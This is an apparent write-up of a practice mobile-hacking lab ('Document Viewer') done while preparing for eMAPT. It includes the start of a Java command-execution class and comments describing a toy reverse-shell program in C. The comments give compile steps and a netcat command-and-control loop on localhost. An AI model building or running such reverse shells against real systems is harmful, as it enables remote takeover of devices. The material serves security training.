During my preparation for eMAPT, I came across Mobile Hacking Labs - and their free hacking labs which I felt would help me for practice. So I decided to give it a try starting with the ‘Document Viewer’ challenge. Getting right into the problem.
The do give out some solid hints & right direction in the problem statement.
| package com.moo.myapplication2; | |
| import java.io.BufferedReader; | |
| import java.io.IOException; | |
| import java.io.InputStreamReader; | |
| public class CommandExecutor { | |
| public static String executeCommand(String command) { | |
| StringBuilder output = new StringBuilder(); |
| // This snippet intents to simulate a baby malware. | |
| // The malware upon running connects to a server, currently hardcoded as 127.0.0.1:8080 | |
| // From server, it accepts a command to be executed locally | |
| // It executes the command locally and then send back the response to the server. | |
| // Basically, just a reverse shell binary. Now when thinking about it, this could have been done in a bash one liner also 🤔 | |
| // But I had fun editing some little C code. So, cool. | |
| // to compile : gcc -o main main.c | |
| // run ./main | |
| // to run the command&control server : while true; do echo -e 'id' | nc -l 8080 ; done |
